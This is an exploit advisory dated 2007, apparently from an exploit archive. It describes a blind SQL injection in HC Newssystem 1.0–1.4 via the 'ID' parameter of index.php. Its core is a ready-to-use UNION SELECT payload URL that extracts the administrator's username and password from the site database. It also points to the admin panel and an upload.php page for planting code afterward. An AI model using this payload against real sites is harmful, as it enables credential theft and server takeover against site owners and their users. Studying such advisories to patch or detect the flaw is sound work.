HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability
# Published : 2007-03-10
# Author : WiLdBoY
# Previous Title : WORK system e-commerce <= 3.0.5 Remote File Inclusion Vulnerability
# Next Title : NukeSentinel <= 2.5.06 (mysql >= 4.0.24) Remote SQL Injection Exploit

HC NEWSSYSTEM 1.0-4 (index.php "ID") Blind SQL Injection

Type :

SQL Injection

Release Date :

{2007-03-08}

Product / Vendor :

HC Design News Publisher.

http://www.hcdesign.at/demo

Bug :

http://localhost/script/index.php?option=news&aktion=komm&ID=-SQL Inj.-

SQL Inj Code :

Admin Username/Password Query

http://localhost/path/index.php?option=news&aktion=komm&ID=-1/**/UNION/**/SELECT/**/null,null,mname,null,mpassword,null,null/**/FROM/**/hcmitglieder/**/WHERE/**/id=1/*

Tested :

HC NEWSSYSTEM Version:1.4

Vulnerable :

HC NEWSSYSTEM Version:1.0

-------------------------

HC NEWSSYSTEM Version:1.4

Note :

Title

"HC NEWSSYSTEM Version:1.4"

Admin Panel

http://www.victim.com/[path]/admin

Code Upload

http://www.victim.com/[path]/admin/upload.php

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

# www.Syue.com [2007-03-10]